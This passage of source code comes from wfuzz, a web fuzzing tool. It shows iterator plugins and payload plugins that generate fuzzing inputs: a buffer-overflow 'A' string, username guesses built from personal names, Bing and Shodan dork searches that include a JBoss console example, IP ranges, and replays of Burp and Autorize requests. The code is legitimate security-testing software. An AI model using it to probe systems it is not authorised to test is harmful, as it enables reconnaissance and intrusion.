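        return self


@moduleman_plugin
class product(BaseIterator):
    """Iterator plugin that yields the cartesian product of its payloads."""

    name = "product"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Returns an iterator cartesian product of input iterables."
    category = ["default"]
    priority = 99

    def __init__(self, *i):
        self._payload_list = i
        self.__width = len(i)
        # The number of combinations is the product of the payload counts.
        self.__count = reduce(lambda x, y: x * y.count(), i[1:], i[0].count())
        self.it = itertools.product(*i)

    def count(self):
        return self.__count

    def width(self):
        return self.__width

    def payloads(self):
        return self._payload_list

    def __next__(self):
        return next(self.it)

    def __iter__(self):
        return self


@moduleman_plugin
class chain(BaseIterator):
    """Iterator plugin that yields the items of its payloads one after another."""

    name = "chain"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Returns an iterator returns elements from the first iterable until it is exhausted, then proceeds to the next iterable, until all of the iterables are exhausted."
    category = ["default"]
    priority = 99

    def __init__(self, *i):
        self._payload_list = i
        self.__count = sum(x.count() for x in i)
        self.it = itertools.chain(*i)

    def count(self):
        return self.__count

    def width(self):
        return 1

    def payloads(self):
        return self._payload_list

    def __next__(self):
        # Wrapped in a 1-tuple, matching width() == 1.
        return (next(self.it),)

    def __iter__(self):
        return self

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/payloads/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/autorize.py:
--------------------------------------------------------------------------------
import re
import base64

from wfuzz.exception import FuzzExceptBadFile
from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
from wfuzz.fuzzrequest import FuzzRequest
from wfuzz.plugin_api.base import BasePayload
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.helpers.obj_dyn import rgetattr


@moduleman_plugin
class autorize(BasePayload):
    """Payload plugin that replays the requests of an autorize state file."""

    name = "autorize"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.2"
    description = ("Reads burp extension autorize states",)
    summary = "Returns fuzz results' from autorize."
    category = ["default"]
    priority = 99

    parameters = (
        ("fn", "", True, "Filename of a valid autorize state file."),
        (
            "attr",
            None,
            False,
            "Attribute of fuzzresult to return. If not specified the whole object is returned.",
        ),
    )

    default_parameter = "fn"

    def __init__(self, params):
        BasePayload.__init__(self, params)

        # The number of entries is not known in advance.
        self.__max = -1
        self.attr = self.params["attr"]
        self._it = self._gen_wfuzz(self.params["fn"])

    def count(self):
        return self.__max

    def get_next(self):
        """Return the next result, or its ``attr`` path when one was requested."""
        next_item = next(self._it)

        return next_item if not self.attr else rgetattr(next_item, self.attr)

    def get_type(self):
        return FuzzWordType.WORD

    def _gen_wfuzz(self, output_fn):
        """Yield one FuzzResult per line of the state file ``output_fn``.

        Each line holds 17 tab-separated fields: url, port, schema, request
        and response for three request/response sets, then two result
        fields. Only the first schema and the second, base64-encoded request
        are used. The file is external input: a line with another field
        count, or with a request that is not valid base64, raises
        FuzzExceptBadFile, as does a file that cannot be opened.
        """
        try:
            with open(self.find_file(output_fn), "r") as f:
                for line_number, line in enumerate(f, 1):
                    line = line.rstrip("\r\n")
                    if not line:
                        continue

                    fields = re.split(r"\t+", line)
                    if len(fields) != 17:
                        raise FuzzExceptBadFile(
                            "Malformed autorize state file: line %d has %d fields, expected 17."
                            % (line_number, len(fields))
                        )

                    schema1 = fields[2]
                    # NOTE(review): the second request is paired with the
                    # first schema, as in the original code; confirm that
                    # this pairing is intended.
                    req2 = fields[8]

                    try:
                        # base64.decodestring() no longer exists as of
                        # Python 3.9; b64decode() also accepts str input.
                        raw_req1 = base64.b64decode(req2)
                    except ValueError as e:
                        raise FuzzExceptBadFile(
                            "Malformed autorize state file: line %d: %s"
                            % (line_number, str(e))
                        )
                    # NOTE(review): raw_req1 is bytes on Python 3; confirm
                    # that update_from_raw_http() accepts bytes, or decode
                    # it here.

                    item = FuzzResult()
                    item.history = FuzzRequest()
                    item.history.update_from_raw_http(raw_req1, schema1)

                    yield item
        except IOError as e:
            raise FuzzExceptBadFile("Error opening wfuzz payload file. %s" % str(e))
        except EOFError:
            # End the generator with a plain return: raising StopIteration
            # inside a generator becomes a RuntimeError (PEP 479).
            return

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/bing.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.payloadtools import BingIter
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class bing(BasePayload):
    """Payload plugin that yields the results of a Bing API search."""

    name = "bing"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.2"
    description = (
        'intitle:"JBoss JMX Management Console"',
        "Some examples of bing hacking:",
        "http://www.elladodelmal.com/2010/02/un-poco-de-bing-hacking-i-de-iii.html",
    )

    summary = "Returns URL results of a given bing API search (needs api key)."
    category = ["default"]
    priority = 99

    parameters = (
        ("dork", "", True, "Google dork search string."),
        ("offset", "0", False, "Offset index, starting at zero."),
        ("limit", "0", False, "Number of results. Zero for all."),
    )

    default_parameter = "dork"

    def __init__(self, params):
        BasePayload.__init__(self, params)

        # Both values arrive as strings; int() raises ValueError on bad input.
        offset = int(params["offset"])
        limit = int(params["limit"])

        self._it = BingIter(params["dork"], offset, limit)

    def count(self):
        return self._it.max_count

    def get_next(self):
        return next(self._it)

    def get_type(self):
        return FuzzWordType.WORD

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/buffer_overflow.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class buffer_overflow(BasePayload):
    name = "buffer_overflow"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.2"
    description = ()
    summary = "Returns a string using the following pattern A * given number."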
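# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (("size", "", True, "Size of the overflow string."),)

    default_parameter = "size"

    def __init__(self, params):
        """Build the one-element payload list from the ``size`` parameter."""
        BasePayload.__init__(self, params)

        self.bov_list = ["A" * int(self.params["size"])]
        self.current = 0

    def count(self):
        return 1

    def get_next(self):
        """Return the string once, then signal exhaustion."""
        if self.current != 0:
            raise StopIteration

        elem = self.bov_list[self.current]
        self.current += 1
        return elem

    def get_type(self):
        return FuzzWordType.WORD

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/burpitem.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptBadFile
from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
from wfuzz.fuzzrequest import FuzzRequest
from wfuzz.plugin_api.base import BasePayload
from wfuzz.helpers.obj_dyn import rgetattr

# xml.etree.cElementTree was removed in Python 3.9; ElementTree is the
# supported name.
import xml.etree.ElementTree as ET
from base64 import b64decode


@moduleman_plugin
class burpitem(BasePayload):
    """Payload that rebuilds request/response pairs from a Burp items XML file."""

    name = "burpitem"
    author = ("Bendegúz Nagy (@PaperTsar)",)
    version = "0.1"
    description = (
        "This payload loads request/response from items saved from Burpsuite.",
    )
    summary = "This payload loads request/response from items saved from Burpsuite."
    category = ["default"]
    priority = 99

    parameters = (
        ("fn", "", True, "Filename of a valid Burp item file."),
        (
            "attr",
            None,
            False,
            "Attribute of fuzzresult to return. If not specified the whole object is returned.",
        ),
    )

    default_parameter = "fn"

    def __init__(self, params):
        """Store the requested attribute and create the lazy item generator."""
        BasePayload.__init__(self, params)

        self.__max = -1
        self.attr = self.params["attr"]
        self._it = self._gen_burpitem(self.params["fn"])

    def count(self):
        """Return -1; the number of items is not computed up front."""
        return self.__max

    def get_next(self):
        """Return the next result, or its ``attr`` attribute when one was given."""
        next_item = next(self._it)

        return next_item if not self.attr else rgetattr(next_item, self.attr)

    def get_type(self):
        return FuzzWordType.FUZZRES if not self.attr else FuzzWordType.WORD

    def _gen_burpitem(self, output_fn):
        """Yield one FuzzResult per ``<item>`` element of the Burp file.

        Raises:
            FuzzExceptBadFile: the file cannot be opened or is not well-formed
                XML.
        """
        try:
            # NOTE(security): the standard-library XML parsers are not hardened
            # against maliciously constructed documents (for example
            # entity-expansion denial of service). Only load exports from a
            # source you trust.
            tree = ET.parse(self.find_file(output_fn))
            for item in tree.getroot().iter("item"):
                host = item.find("host")

                fr = FuzzRequest()
                fr.update_from_raw_http(
                    raw=b64decode(item.find("request").text or "").decode("utf-8"),
                    scheme=item.find("protocol").text,
                    raw_response=b64decode(item.find("response").text or ""),
                )
                fr.wf_ip = {
                    # Prefer the resolved address recorded by Burp, falling
                    # back to the host name.
                    "ip": host.attrib.get("ip", None) or host.text,
                    "port": item.find("port").text,
                }
                frr = FuzzResult(history=fr)

                yield frr.update()
            return
        except IOError as e:
            raise FuzzExceptBadFile(
                "Error opening Burp items payload file. %s" % str(e)
            )
        except ET.ParseError as e:
            # A malformed file previously surfaced as a raw parser traceback.
            raise FuzzExceptBadFile(
                "Error parsing Burp items payload file. %s" % str(e)
            )
        except EOFError:
            return

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/dirwalk.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType

import os

# Python 2 and 3: alternative 4
try:
    from urllib.parse import quote
except ImportError:
    from urllib import quote


@moduleman_plugin
class dirwalk(BasePayload):
    """Payload that returns the relative paths of files under a local directory."""

    name = "dirwalk"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = (
        "Returns all the file paths found in the specified directory.",
        "Handy if you want to check a directory structure against a webserver,",
        "for example, because you have previously downloaded a specific version",
        "of what is supposed to be on-line.",
    )
    summary = "Returns filename's recursively from a local directory."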
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("dir", "", True, "Directory path to walk and generate payload from."),
    )

    default_parameter = "dir"

    def __init__(self, params):
        """Create the lazy generator over the ``dir`` parameter."""
        BasePayload.__init__(self, params)

        self.g = self._my_gen(self.params["dir"])

    def _my_gen(self, directory):
        """Yield every file below ``directory`` as a URL-quoted relative path."""
        for current_dir, _subdirs, filenames in os.walk(directory):
            for filename in filenames:
                full_path = os.path.join(current_dir, filename)
                # Paths are emitted relative to the walked directory, never
                # absolute.
                yield quote(os.path.relpath(full_path, directory))

    def get_next(self):
        return next(self.g)

    def get_type(self):
        return FuzzWordType.WORD

    def count(self):
        """Return -1; the tree is not walked in advance to count files."""
        return -1

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/file.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptBadFile
from wfuzz.plugin_api.base import BasePayload
from wfuzz.helpers.file_func import FileDetOpener
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class file(BasePayload):
    """Payload that returns the lines of a dictionary file one at a time."""

    name = "file"
    author = (
        "Carlos del Ojo",
        "Christian Martorella",
        "Adapted to newer versions Xavi Mendez (@xmendez)",
    )
    version = "0.2"
    description = ("Returns the contents of a dictionary file line by line.",)
    summary = "Returns each word from a file."
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("fn", "", True, "Filename of a valid dictionary"),
        (
            "count",
            "True",
            False,
            "Indicates if the number of words in the file should be counted.",
        ),
        ("encoding", "Auto", False, "Indicates the file encoding."),
    )

    default_parameter = "fn"

    def __init__(self, params):
        """Open the dictionary file, honouring an explicit encoding if given.

        Raises:
            FuzzExceptBadFile: the file cannot be opened.
        """
        BasePayload.__init__(self, params)

        try:
            # "auto" (any case) means no explicit encoding is passed on.
            if self.params["encoding"].lower() != "auto":
                encoding = self.params["encoding"]
            else:
                encoding = None
            self.f = FileDetOpener(self.find_file(self.params["fn"]), encoding)
        except IOError as e:
            raise FuzzExceptBadFile("Error opening file. %s" % str(e))

        self.__count = None

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the next line stripped of surrounding whitespace."""
        word = next(self.f)
        if word:
            return word.strip()

        # An empty read marks the end of the file.
        self.f.close()
        raise StopIteration

    def count(self):
        """Return the number of lines, or -1 when counting is disabled."""
        if self.params["count"].lower() == "false":
            return -1

        if self.__count is None:
            # Counting consumes the file, so it is rewound afterwards.
            self.__count = sum(1 for _ in self.f)
            self.f.reset()

        return self.__count

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/guitab.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType

from wfuzz.facade import Facade


@moduleman_plugin
class guitab(BasePayload):
    """Payload that returns the entries stored under a GUI tab name."""

    name = "guitab"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = (
        "** This is a beta plugin for the GUI under construction.",
        "This payload reads requests from a tab in the GUI",
    )
    summary = "This payload reads requests from a tab in the GUI"
    category = ["default"]
    priority = 99

    parameters = (
        ("tab", "", True, "Name of a valid GUI tab."),
        (
            "attr",
            None,
            False,
            "Attribute of fuzzresult to return. If not specified the whole object is returned.",
        ),
    )

    default_parameter = "tab"

    def __init__(self, params):
        """Store the requested attribute and start iterating the tab's data."""
        BasePayload.__init__(self, params)

        self.attr = self.params["attr"]
        tab_name = self.params["tab"]
        self._it = iter(Facade().data[tab_name])

    def count(self):
        """Return the number of entries currently stored for the tab."""
        tab_name = self.params["tab"]
        return len(Facade().data[tab_name])

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the next entry, or its ``attr`` field when one was given."""
        entry = next(self._it)

        if self.attr:
            return entry.get_field(self.attr)
        return entry

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/hexrand.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.exception import FuzzExceptPluginBadParams
from wfuzz.fuzzobjects import FuzzWordType

import random


@moduleman_plugin
class hexrand(BasePayload):
    """Payload that returns random hexadecimal numbers within a range."""

    name = "hexrand"
    author = (
        "Carlos del Ojo",
        "Christian Martorella",
        "Adapted to newer versions Xavi Mendez (@xmendez)",
    )
    version = "0.1"
    description = ()
    summary = "Returns random hex numbers from the given range."
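# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        (
            "range",
            "",
            True,
            "Range of hex numbers to randomly generate in the form of 00-ff.",
        ),
    )

    default_parameter = "range"

    def __init__(self, params):
        """Parse the ``min-max`` hexadecimal range.

        Raises:
            FuzzExceptPluginBadParams: the range is not two hex numbers
                separated by "-".
        """
        BasePayload.__init__(self, params)

        try:
            ran = self.params["range"].split("-")
            self.minimum = int(ran[0], 16)
            self.maximum = int(ran[1], 16)
            self.__count = -1
        except (ValueError, IndexError):
            # IndexError: no "-" separator, so there is no upper bound. It was
            # previously left uncaught and escaped as a raw traceback.
            raise FuzzExceptPluginBadParams('Bad range format (eg. "0-ffa")')

    def __iter__(self):
        return self

    def count(self):
        """Return -1; the random stream has no fixed length."""
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return a random value in [minimum, maximum] as zero-padded hex."""
        # SystemRandom draws from the operating system's entropy source.
        self.current = random.SystemRandom().randint(self.minimum, self.maximum)

        # Pad to the number of hex digits of the upper bound.
        lgth = len(hex(self.maximum).replace("0x", ""))
        num = hex(self.current).replace("0x", "")

        return num.rjust(lgth, "0")

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/hexrange.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.exception import FuzzExceptBadOptions
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class hexrange(BasePayload):
    """Payload that returns every hexadecimal number of a range in order."""

    name = "hexrange"
    author = (
        "Carlos del Ojo",
        "Christian Martorella",
        "Adapted to newer versions Xavi Mendez (@xmendez)",
    )
    version = "0.1"
    description = ()
    summary = "Returns each hex number of the given hex range."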
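# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("range", "", True, "Range of hex numbers to generate in the form of 00-ff."),
    )

    default_parameter = "range"

    def __init__(self, params):
        """Parse the ``min-max`` hexadecimal range and set up the counter.

        Raises:
            FuzzExceptBadOptions: the range is not two hex numbers separated
                by "-".
        """
        BasePayload.__init__(self, params)

        try:
            ran = self.params["range"].split("-")
            self.minimum = int(ran[0], 16)
            self.maximum = int(ran[1], 16)
            self.__count = self.maximum - self.minimum + 1
            self.current = self.minimum
            # Pad to the widest of: either bound as typed, or the upper bound's
            # natural hex width.
            self.lgth = max(
                len(ran[0]), len(ran[1]), len(hex(self.maximum).replace("0x", ""))
            )
        except (ValueError, IndexError):
            # IndexError: no "-" separator, so there is no upper bound. It was
            # previously left uncaught and escaped as a raw traceback.
            raise FuzzExceptBadOptions('Bad range format (eg. "0-ffa")')

    def count(self):
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the current value as zero-padded hex and advance by one."""
        if self.current > self.maximum:
            raise StopIteration

        num = hex(self.current).replace("0x", "")
        payl = num.rjust(self.lgth, "0")

        self.current += 1

        return payl

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/ipnet.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptPluginBadParams, FuzzExceptBadInstall
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class ipnet(BasePayload):
    """Payload that returns the host addresses of a network given as ip/mask."""

    name = "ipnet"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = ("ie. 192.168.1.0/24", "Requires: netaddr module")
    summary = "Returns list of IP addresses of a network."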
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (("net", "", True, "Network range in the form ip/mask."),)

    default_parameter = "net"

    def __init__(self, params):
        """Build the host iterator for the ``net`` parameter.

        Raises:
            FuzzExceptPluginBadParams: the network is malformed or the computed
                host count is not positive.
            FuzzExceptBadInstall: the netaddr module is not installed.
        """
        BasePayload.__init__(self, params)

        try:
            # netaddr is imported here so that a missing module is reported as
            # an install problem instead of failing at import time.
            from netaddr import IPNetwork
            from netaddr.core import AddrFormatError

            net = IPNetwork("%s" % self.params["net"])
            self.f = net.iter_hosts()
            # size minus two addresses; presumably network and broadcast
            # (TODO confirm for very small networks).
            self.__count = net.size - 2

            if self.__count <= 0:
                raise FuzzExceptPluginBadParams(
                    "There are not hosts in the specified network"
                )

        except ValueError:
            raise FuzzExceptPluginBadParams(
                "The specified network has an incorrect format."
            )
        except ImportError:
            raise FuzzExceptBadInstall(
                "ipnet plugin requires netaddr module. Please install it using pip."
            )
        # Keep this clause after ImportError: AddrFormatError is only bound
        # when the import above succeeded.
        except AddrFormatError:
            raise FuzzExceptPluginBadParams(
                "The specified network has an incorrect format."
            )

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        # Addresses are returned in their string form.
        return str(next(self.f))

    def count(self):
        return self.__count

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/iprange.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptPluginBadParams, FuzzExceptBadInstall
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class iprange(BasePayload):
    """Payload that returns every address of a first-last IP range."""

    name = "iprange"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = (
        "ie. 192.168.1.0-192.168.1.12",
        "Requires: netaddr module",
    )
    summary = "Returns list of IP addresses of a given IP range."
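# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("iprange", "", True, "IP address range int the form 192.168.1.0-192.168.1.12"),
    )

    default_parameter = "iprange"

    def __init__(self, params):
        """Build the address iterator for the ``iprange`` parameter.

        Raises:
            FuzzExceptBadInstall: the netaddr module is not installed.
            FuzzExceptPluginBadParams: the range is malformed or has no "-"
                separator.
        """
        BasePayload.__init__(self, params)

        try:
            # netaddr is imported here so that a missing module is reported as
            # an install problem instead of failing at import time.
            from netaddr import IPRange
            from netaddr.core import AddrFormatError

            ran = self.params["iprange"].split("-")
            net = IPRange(ran[0], ran[1])
            self.f = iter(net)
            self.__count = net.size
        except ImportError:
            # The message used to name the ipnet plugin (copy/paste slip).
            raise FuzzExceptBadInstall(
                "iprange plugin requires netaddr module. Please install it using pip."
            )
        # Keep this clause after ImportError: AddrFormatError is only bound
        # when the import above succeeded.
        except AddrFormatError:
            raise FuzzExceptPluginBadParams(
                "The specified network range has an incorrect format."
            )
        except IndexError:
            # No "-" separator, so there is no end address.
            raise FuzzExceptPluginBadParams(
                "The specified network range has an incorrect format."
            )

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        # Addresses are returned in their string form.
        return str(next(self.f))

    def count(self):
        return self.__count

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/list.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class list(BasePayload):
    """Payload that returns the words of a "-" separated list.

    The class name shadows the builtin ``list`` inside this module.
    """

    name = "list"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = ("ie word1-word2",)
    summary = "Returns each element of the given word list separated by -."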
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("values", "", True, "Values separated by - to return as a dictionary."),
    )

    default_parameter = "values"

    def __init__(self, params):
        """Split ``values`` on "-", honouring the "\\-" and "\\\\" escapes."""
        BasePayload.__init__(self, params)

        if "\\" in self.params["values"]:
            # Hide escaped separators and escaped backslashes behind
            # placeholders, split, then restore them in every element.
            self.params["values"] = self.params["values"].replace("\\-", "$SEP$")
            self.params["values"] = self.params["values"].replace("\\\\", "$SCAP$")

            self.value_list = [
                word.replace("$SEP$", "-").replace("$SCAP$", "\\")
                for word in self.params["values"].split("-")
            ]
        else:
            self.value_list = self.params["values"].split("-")

        self.__count = len(self.value_list)
        self.current = 0

    def count(self):
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the next word in order, raising StopIteration at the end."""
        if self.current >= self.__count:
            raise StopIteration

        elem = self.value_list[self.current]
        self.current += 1
        return elem

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/names.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class names(BasePayload):
    """Payload that derives candidate usernames from "-" separated name parts."""

    name = "names"
    author = (
        "Christian Martorella",
        "Adapted to newer versions Xavi Mendez (@xmendez)",
    )
    version = "0.1"
    description = ("ie. jon-smith",)
    summary = "Returns possible usernames by mixing the given words, separated by -, using known typical constructions."
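# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (("name", "", True, "Name and surname in the form of name-surname."),)

    default_parameter = "name"

    def __init__(self, params):
        """Build the list of username candidates from the ``name`` parameter."""
        BasePayload.__init__(self, params)

        possibleusernames = []
        name = ""
        llist = self.params["name"].split("-")

        # Join the parts with single spaces; empty leading parts add no space.
        for x in llist:
            if name == "":
                name = name + x
            else:
                name = name + " " + x

        if " " in name:
            parts = name.split()
            first, second, last = parts[0], parts[1], parts[-1]

            # Combinations of the first two parts.
            possibleusernames.extend(
                [
                    first,
                    first + "." + second,
                    first + second,
                    first + "." + second[0],
                    first[0] + "." + second,
                    first + second[0],
                    first[0] + second,
                ]
            )

            # Prefixes built from every part except the last one.
            leading = parts[:-1]
            dotted = "".join(p + "." for p in leading)
            joined = "".join(leading)
            dotted_initials = "".join(p[0] + "." for p in leading)
            initials = "".join(p[0] for p in leading)

            possibleusernames.extend(
                [
                    dotted + last,
                    joined + last,
                    initials + last,
                    dotted_initials + last,
                    joined + last[0],
                    initials + last[0],
                    # Combinations of the first and the last part.
                    last,
                    first + "." + last,
                    first + last,
                    first + "." + last[0],
                    first[0] + "." + last,
                    first + last[0],
                    first[0] + last,
                ]
            )
        else:
            possibleusernames.append(name)

        self.creatednames = possibleusernames
        self.__count = len(possibleusernames)

    def count(self):
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Pop and return the last remaining candidate."""
        if not self.creatednames:
            raise StopIteration

        return self.creatednames.pop()

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/permutation.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.exception import FuzzExceptBadOptions
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class permutation(BasePayload):
    """Payload that returns fixed-length strings built from a charset."""

    name = "permutation"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = ()
    summary = "Returns permutations of the given charset and length."
    category = ["default"]
    priority = 99

    parameters = (("ch", "", True, "Charset and len to permute in the form of abc-2."),)

    default_parameter = "ch"

    def __init__(self, params):
        """Parse ``charset-length`` and precompute every word.

        Raises:
            FuzzExceptBadOptions: the parameter is not ``charset-length`` with
                an integer length.
        """
        BasePayload.__init__(self, params)
        self.charset = []

        try:
            ran = self.params["ch"].split("-")
            self.charset = ran[0]
            self.width = int(ran[1])
        except (ValueError, IndexError):
            # IndexError: no "-" separator, so there is no length. The message
            # used to show a hex-range example copied from another plugin.
            raise FuzzExceptBadOptions('Bad charset format (eg. "abc-2")')

        pset = list(self.charset)

        # All words are materialised up front; get_next() pops from the end.
        self.lista = ["".join(word) for word in self.xcombinations(pset, self.width)]

        self.__count = len(self.lista)

    def count(self):
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Pop and return the last remaining word."""
        if self.lista != []:
            payl = self.lista.pop()
            return payl
        else:
            raise StopIteration

    def xcombinations(self, items, n):
        """Yield every length-``n`` list of elements drawn from ``items``."""
        if n == 0:
            yield []
        else:
            for i in range(len(items)):
                # NOTE(review): items[:i] + items[i:] is the full list again,
                # so elements may repeat within a word. A permutation without
                # repetition would use items[i + 1:]. Confirm what is intended
                # before changing the generated set.
                for cc in self.xcombinations(items[:i] + items[i:], n - 1):
                    yield [items[i]] + cc

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/range.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptPluginBadParams
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class range(BasePayload):
    """Payload that returns every integer of a ``min-max`` range.

    The class name shadows the builtin ``range`` inside this module.
    """

    name = "range"
    author = (
        "Carlos del Ojo",
        "Christian Martorella",
        "Adapted to newer versions Xavi Mendez (@xmendez)",
    )
    version = "0.1"
    description = ("ie. 0-10",)
    summary = "Returns each number of the given range."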
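# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (("range", "", True, "Range of numbers in the form 0-10."),)

    default_parameter = "range"

    def __init__(self, params):
        """Parse the ``min-max`` decimal range.

        Raises:
            FuzzExceptPluginBadParams: the range is not two integers separated
                by "-".
        """
        BasePayload.__init__(self, params)

        try:
            ran = self.params["range"].split("-")
            self.minimum = int(ran[0])
            self.maximum = int(ran[1])
            self.__count = self.maximum - self.minimum + 1
            # Output is zero-padded to the width of the lower bound as typed.
            self.width = len(ran[0])
            self.current = self.minimum
        except (ValueError, IndexError):
            # IndexError: no "-" separator, so there is no upper bound. It was
            # previously left uncaught and escaped as a raw traceback.
            raise FuzzExceptPluginBadParams('Bad range format (eg. "23-56")')

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the current number as a string and advance by one."""
        if self.current > self.maximum:
            raise StopIteration

        if self.width:
            payl = ("%0" + str(self.width) + "d") % (self.current)
        else:
            payl = str(self.current)

        self.current += 1
        return payl

    def count(self):
        return self.__count

    def __iter__(self):
        return self

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/shodanp.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.payloadtools import ShodanIter
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType


@moduleman_plugin
class shodanp(BasePayload):
    """Payload that turns Shodan API search matches into URLs."""

    name = "shodanp"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = ("Queries the Shodan API",)

    summary = "Returns URLs of a given Shodan API search (needs api key)."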
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = (
        ("search", "", True, "Shodan search string."),
        ("page", "0", False, "Offset page, starting at zero."),
        (
            "limit",
            "0",
            False,
            "Number of pages (1 query credit = 100 results). Zero for all.",
        ),
    )

    default_parameter = "search"

    def __init__(self, params):
        """Parse the numeric parameters and create the search iterator."""
        BasePayload.__init__(self, params)

        query = params["search"]
        first_page = int(params["page"])
        page_limit = int(params["limit"])

        self._it = ShodanIter(query, first_page, page_limit)

    def count(self):
        """Return -1; the number of matches is not computed up front."""
        return -1

    def close(self):
        """Stop the underlying search iterator."""
        self._it._stop()

    def get_type(self):
